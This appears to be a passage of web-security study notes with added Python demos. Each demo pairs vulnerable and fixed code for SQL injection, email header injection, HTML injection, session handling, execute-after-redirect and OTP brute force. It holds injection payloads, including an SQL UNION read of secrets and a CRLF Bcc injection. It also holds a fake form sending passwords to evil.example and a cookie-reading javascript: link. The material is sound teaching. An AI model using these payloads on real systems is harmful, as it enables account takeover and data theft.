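Added example (not from the notes): an in-memory SQLite database with a constructed `users` table and a `secrets` table, a login query built by string formatting (the injection point) and the same check done with a parameterised query. It shows the classic authentication bypass and the UNION-based read of another table that the notes list; the payloads are constructed for this schema.

```python
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        CREATE TABLE secrets(id INTEGER PRIMARY KEY, owner TEXT, value TEXT);
        INSERT INTO users(name, password) VALUES ('alice', 'hunter2'), ('bob', 'letmein');
        INSERT INTO secrets(owner, value) VALUES ('alice', 'API-KEY-0001'), ('bob', 'API-KEY-0002');
    """)
    return db


def login_vulnerable(db, name, password):
    # User input is spliced into the SQL text, so a quote in the input
    # changes the structure of the query.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return [row[0] for row in db.execute(sql)]


def login_safe(db, name, password):
    # Placeholders: the driver sends the values separately from the query text,
    # so a quote in the input is just data.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (name, password))]


# Constructed payloads.
BYPASS = "' OR '1'='1"                                  # closes the quote, makes WHERE always true
UNION = "' UNION SELECT value FROM secrets -- "         # appends a SELECT with one column; comments out the rest


def demo():
    db = make_db()
    return {
        "bypass_vuln": sorted(login_vulnerable(db, BYPASS, BYPASS)),   # every user matches
        "union_vuln": sorted(login_vulnerable(db, UNION, "x")),        # rows from another table
        "bypass_safe": login_safe(db, BYPASS, BYPASS),                 # nothing matches
        "plain": login_safe(db, "alice", "hunter2"),
    }
```

The UNION payload works because the injected SELECT returns the same number of columns (one) as the original; finding that column count, and a column whose output is rendered, is the first step of a real UNION-based attack.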
SMTP INJECTION vulnerabilities arise when user input is placed into email headers (sender address, subject) without adequate sanitization, allowing an attacker to inject additional headers with arbitrary values. This can be exploited to send copies of emails to third parties (an injected Bcc header), attach files, etc.

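Added example (not from the notes): a contact-form mailer that places the user's address straight into the raw header block (vulnerable) and one that refuses the value if it contains a line break. The result is parsed back with the standard library `email` parser so the injected header is visible as a real header; the payload is constructed.

```python
from email.parser import Parser

# Constructed attacker value for the "your address" form field.
PAYLOAD = "victim@example.com\r\nBcc: attacker@evil.example"


def build_message_vulnerable(user_address, body):
    # Raw concatenation: a CR LF inside user_address terminates the From
    # header and whatever follows becomes a new header line.
    return (f"From: {user_address}\r\n"
            f"To: support@example.com\r\n"
            f"Subject: contact form\r\n"
            f"\r\n{body}")


def address_is_clean(user_address):
    # Reject line breaks before the value can reach the header block;
    # a proper address parser on top of this would be stricter still.
    return "\r" not in user_address and "\n" not in user_address and "@" in user_address


def build_message_safe(user_address, body):
    if not address_is_clean(user_address):
        raise ValueError("invalid address")
    return build_message_vulnerable(user_address, body)


def header_values(raw, name):
    """Parse the raw message back and return all values of one header."""
    return Parser().parsestr(raw).get_all(name) or []
```

The same CR LF trick applies to every header a form feeds (Subject, Reply-To, a name field), and a blank line in the payload lets the attacker replace the whole body, so the check belongs on every field, not only the address.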
XPATH INJECTION is an attack technique used to exploit applications that construct XPath queries from user-supplied input to query or navigate XML documents. XPath can be used directly by an application to query an XML document, or as part of a larger operation such as applying an XSLT transformation or an XQuery to the document. The syntax of XPath bears some resemblance to SQL, and it is indeed possible to form SQL-like queries on an XML document using XPath, so the same quote-breaking payloads (`' or '1'='1`) apply.

SSI INJECTION (SERVER SIDE INCLUDES)

HTML INJECTION is an attack similar to cross-site scripting: while in an XSS vulnerability the attacker can inject and execute JavaScript, HTML injection only allows the injection of certain HTML tags. When an application does not properly handle user-supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page (a fake login form, a link, a defaced section). This attack is typically used in conjunction with some form of social engineering, as it exploits both a code-based vulnerability and the user's trust in the site.

Remediation for HTML injection: encode user input for the HTML context it is rendered in (text node, attribute value, URL) rather than trying to filter meta characters such as `<`, `>` and `"` out of the input.

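Added example (not from the notes): a profile fragment that drops user-supplied values into an HTML text node and into an href attribute, rendered once without encoding and once with contextual output encoding (`html.escape`) plus a URL scheme allow-list. The template and the two payloads are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Page fragment with two sinks: an HTML text node and an href attribute.
TEMPLATE = '<p>Hello {name}</p><a href="{site}">homepage</a>'

# Constructed attacker input: a fake "session expired" form that posts the
# password elsewhere (pure HTML, no script), and a javascript: link.
NAME_PAYLOAD = ('<form action="https://evil.example/steal">Session expired, '
                're-enter password: <input name="p"></form>')
SITE_PAYLOAD = "javascript:alert(document.cookie)"


def render_vulnerable(name, site):
    # User values dropped straight into the markup.
    return TEMPLATE.format(name=name, site=site)


def safe_url(site):
    # Escaping does nothing to "javascript:...", so the URL context needs a
    # scheme allow-list on top of attribute encoding.
    parts = urlsplit(site)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return "#"
    return html.escape(site, quote=True)


def render_safe(name, site):
    # Encode for the context: the text node gets <, > and & escaped; the
    # attribute value additionally has quotes escaped (quote=True).
    return TEMPLATE.format(name=html.escape(name, quote=True), site=safe_url(site))
```

The `javascript:` link is the reason "filter meta characters" is the wrong remediation: that payload contains none of `<`, `>`, `"` or `&`, yet it is live in the vulnerable output.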
LDAP injection

-------------------------------------------------------------------------

Broken authentication & session management

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

In broken authentication and session management, attackers attempt to take over other users' accounts by exploiting leaks and flaws in the authentication or session management functions.

Why this attack occurs:
credentials can be guessed or overwritten through weak account management functions (e.g. the attacker can guess a session id, or reset another user's password)

session ids are exposed in the URL (they end up in browser history, logs and Referer headers)

session ids do not time out

and much more


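Added example (not from the notes): a server-side session store that avoids the weaknesses listed above: unguessable ids from the `secrets` module, idle and absolute timeouts, rotation of the id at login, and the id carried in a cookie with `HttpOnly`, `Secure` and `SameSite` instead of the URL. The timeout values are assumed example policy, and the clock is injectable so the timeouts can be exercised without waiting.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds without activity before the session dies (assumed)
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap regardless of activity (assumed)


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock
        self._sessions = {}   # opaque id -> {"user", "created", "last_seen"}

    def create(self, user):
        sid = secrets.token_urlsafe(32)          # 256 bits of entropy, not guessable
        now = self.clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def rotate(self, old_sid, user):
        # Issue a fresh id at login so a pre-login id (session fixation) is never promoted.
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def lookup(self, sid):
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]              # timed out: drop it server side
            return None
        s["last_seen"] = now
        return s["user"]

    def destroy(self, sid):
        # Logout must invalidate server side, not just clear the cookie.
        self._sessions.pop(sid, None)


def set_cookie_header(sid):
    # HttpOnly keeps scripts away from the id, Secure keeps it off plaintext HTTP,
    # SameSite=Lax stops it riding along on cross-site POSTs; nothing goes in the URL.
    return f"Set-Cookie: sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def demo_idle_timeout():
    """Return (user seen just before the idle limit, user seen after it)."""
    clock = {"t": 1000.0}
    store = SessionStore(clock=lambda: clock["t"])
    sid = store.create("alice")
    clock["t"] += IDLE_TIMEOUT - 1
    before = store.lookup(sid)          # still valid, and last_seen is refreshed
    clock["t"] += IDLE_TIMEOUT + 1
    after = store.lookup(sid)           # idle too long: gone
    return before, after
```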
Authentication controls

* AUTHENTICATION BYPASS THROUGH RESPONSE TAMPERING: an attacker exploits this vulnerability to bypass authentication and reach post-login modules. If the application sends the authentication success criteria in the response (e.g. a `success: true` flag or a role value that the client then acts on), the attacker edits the response in an intercepting proxy to become "authenticated". If requests to post-login modules are validated only on the Referer header, it may be possible to add a suitable Referer header to manually crafted requests and get through. If the application relies on the existence or the values of cookies when performing security-critical operations, but does not properly ensure that the setting is valid for the associated user, authentication can likewise be bypassed.

* EXECUTION AFTER REDIRECT (EAR): the web application sends a redirect to another location but, instead of stopping, continues to execute the code that follows it. An attacker who ignores the redirect (trivial in a proxy) receives content intended for authenticated users. For example, on wrong credentials the application returns a 302 back to the login page but also includes the user's dashboard in the response body, which exposes the victim's dashboard to the attacker.

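Added example (not from the notes): the login handler from the example above, modelled as a function returning `(status, headers, body)` the way a WSGI application would. The vulnerable version sets a 302 to the login page on bad credentials but keeps rendering the dashboard; the fixed version returns as soon as the redirect is decided. The user table is constructed.

```python
import secrets

USERS = {"alice": "hunter2"}   # constructed credentials; a real app stores password hashes


def render_dashboard(user):
    return f"<h1>Dashboard for {user}</h1><p>balance: 1,234.00</p>"


def credentials_ok(user, password):
    stored = USERS.get(user)
    return stored is not None and secrets.compare_digest(stored, password)


def login_vulnerable(user, password):
    status, headers = 200, {}
    if not credentials_ok(user, password):
        status, headers = 302, {"Location": "/login?error=1"}
        # BUG: no return here; the handler keeps going and renders the
        # dashboard into the body of the 302 response.
    body = render_dashboard(user)
    return status, headers, body


def login_fixed(user, password):
    if not credentials_ok(user, password):
        return 302, {"Location": "/login?error=1"}, ""   # stop here, nothing follows
    return 200, {}, render_dashboard(user)


def attacker_view(handler):
    """What an intercepting proxy that ignores the Location header sees."""
    status, _headers, body = handler("alice", "wrong-password")
    return status, body
```

In a browser the 302 is followed before anything is shown, which is why this slips through manual testing; the proxy's raw response view, or `curl` without `-L`, shows the body.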
* OTP RETURNED IN RESPONSE: applications implement a second factor such as an OTP to strengthen the authentication process. The OTP scheme is insecure if an attacker can obtain or bypass the OTP in an inconspicuous way and so reach the protected functionality. That happens when: the OTP is returned in the response body sent in reply to the OTP trigger request; the OTP is not user-bound, so any OTP generated by the application works for any user; the OTP check is only a front-end validation, which a proxy tool bypasses; OTP generation is vulnerable to collisions, where a single OTP is generated for two different users who fire the request at the same time; the OTP does not expire after a period; or the OTP is not invalidated after first use, so one OTP can be replayed.

* THROUGH RESPONSE MODIFICATION: the OTP check is a front-end validation that can be bypassed with a proxy tool; the attacker modifies the response to the OTP verification request (e.g. turns a failure into a success) and skips the OTP step.

* OTP COLLISION ATTACK:

* LACK OF OTP BINDING WITH USER ID: the OTP is not bound to the user, so any OTP generated by the application works for any user. The attacker generates an OTP for their own account and uses it to take over any other account.

* LACK OF OTP BRUTE FORCE PREVENTION: a brute-force attack attempts to discover a value by systematically trying every combination of numbers, letters and symbols until the correct one is found. Such attacks are usually carried out with widely available tools that include smart rules and wordlists and guess values automatically. Here the OTP functionality implements no mechanism to prevent brute forcing (no attempt limit, no lockout, no expiry), so an attacker can guess the victim's OTP; how easy that is depends on the length and character set of the OTP the application server generates (a 6-digit numeric OTP has only one million possibilities).

* LACK OF PASSWORD BRUTE FORCE PREVENTION: the application has implemented no mechanism (rate limiting, account lockout, CAPTCHA) to stop repeated login attempts, so an attacker can brute force the victim's password. How easy that is depends on the length and complexity of the passwords the password policy allows.

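Added example (not from the notes) serving the OTP items above and the password brute-force item: an OTP issuer/verifier that has each property the notes list as missing (bound to the user, never echoed in the response, expires, single use, attempt-limited) and a per-account failure counter that also throttles password guessing. Delivery is a hypothetical `send_sms` hook, the clock and the OTP source are injectable so the demo is reproducible, and the TTL, attempt and lockout values are assumed policy.

```python
import hashlib
import hmac
import secrets
import time

OTP_TTL = 300          # seconds an OTP stays valid (assumed policy value)
MAX_ATTEMPTS = 5       # failures per account before lockout (assumed)
LOCKOUT = 15 * 60      # seconds the lockout lasts (assumed)


class FailureCounter:
    """Per-account failure count with a lockout window; shared by OTP and password checks."""

    def __init__(self, clock):
        self.clock, self._fails = clock, {}   # key -> (count, first_failure_time)

    def locked(self, key):
        n, since = self._fails.get(key, (0, 0.0))
        if n >= MAX_ATTEMPTS and self.clock() - since < LOCKOUT:
            return True
        if n >= MAX_ATTEMPTS:             # lockout expired: forget the old failures
            del self._fails[key]
        return False

    def record(self, key, success):
        if success:
            self._fails.pop(key, None)
        else:
            n, since = self._fails.get(key, (0, self.clock()))
            self._fails[key] = (n + 1, since)


class OtpService:
    def __init__(self, send_sms, clock=time.time, otp_source=lambda: secrets.randbelow(10**6)):
        self.send_sms, self.clock, self.otp_source = send_sms, clock, otp_source
        self._pending = {}                      # user -> (digest, expiry)
        self.counter = FailureCounter(clock)

    @staticmethod
    def _digest(user, otp):
        return hashlib.sha256(f"{user}:{otp}".encode()).hexdigest()   # binds the OTP to the user

    def issue(self, user):
        otp = f"{self.otp_source():06d}"        # 6 digits from a CSPRNG by default
        self._pending[user] = (self._digest(user, otp), self.clock() + OTP_TTL)
        self.send_sms(user, otp)                # out-of-band delivery only (hypothetical hook)
        return {"status": "sent"}               # the OTP itself is never in the response

    def verify(self, user, otp):
        if self.counter.locked(user):
            return False
        entry = self._pending.get(user)
        if entry is None or self.clock() > entry[1]:   # unknown or expired
            self._pending.pop(user, None)
            return False
        ok = hmac.compare_digest(entry[0], self._digest(user, otp))
        self.counter.record(user, ok)
        if ok:
            del self._pending[user]             # single use
        return ok


class PasswordLogin:
    """Password endpoint guarded by the same per-account failure counter."""

    def __init__(self, clock=time.time):
        self.counter = FailureCounter(clock)
        # Constructed user; a real system stores a slow KDF hash (argon2/scrypt/bcrypt), not SHA-256.
        self._users = {"alice": hashlib.sha256(b"correct horse").hexdigest()}

    def login(self, user, password):
        if self.counter.locked(user):
            return False
        ok = hmac.compare_digest(self._users.get(user, ""),
                                 hashlib.sha256(password.encode()).hexdigest())
        self.counter.record(user, ok)
        return ok


def demo():
    """Exercise user binding, replay, brute force and expiry with fixed OTP values."""
    clock, sent = {"t": 0.0}, {}
    fixed = iter([111111, 222222, 333333, 444444])   # constructed: reproducible OTPs for the demo
    svc = OtpService(send_sms=lambda user, otp: sent.__setitem__(user, otp),
                     clock=lambda: clock["t"], otp_source=lambda: next(fixed))
    svc.issue("alice")
    svc.issue("bob")
    r = {"cross_user": svc.verify("bob", sent["alice"]),   # alice's OTP is useless for bob
         "first_use": svc.verify("alice", sent["alice"]),
         "replay": svc.verify("alice", sent["alice"])}
    svc.issue("bob")                                      # fresh OTP for bob
    # Sequential guessing: after MAX_ATTEMPTS failures every answer is False,
    # including the genuine OTP, until the lockout window passes.
    r["bruteforce_hits"] = sum(svc.verify("bob", f"{i:06d}") for i in range(1000))
    r["bob_locked"] = svc.counter.locked("bob")
    r["real_after_lockout"] = svc.verify("bob", sent["bob"])
    svc.issue("carol")
    clock["t"] += OTP_TTL + 1
    r["expired"] = svc.verify("carol", sent["carol"])
    return r
```

The lockout is keyed by account, which stops the per-victim attack described above; a spray across many accounts additionally needs a per-source-IP limit, which the same counter can provide with the client address as key.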
* MISSING TWO FACTOR AUTHENTICATION FOR PAYMENTS: two-factor authentication is required for functionality that deals with financial transactions and for applications accessed from insecure networks: if the bank credentials leak and there is no OTP step, the attacker can complete transactions with the credentials alone.

* MISSING FORCED AUTHENTICATION: the web application does not restrict access to its non-public resources through authentication mechanisms based on an access-privilege policy, so an attacker can reach the application's internal sensitive pages without logging in, although those pages should only be available after login.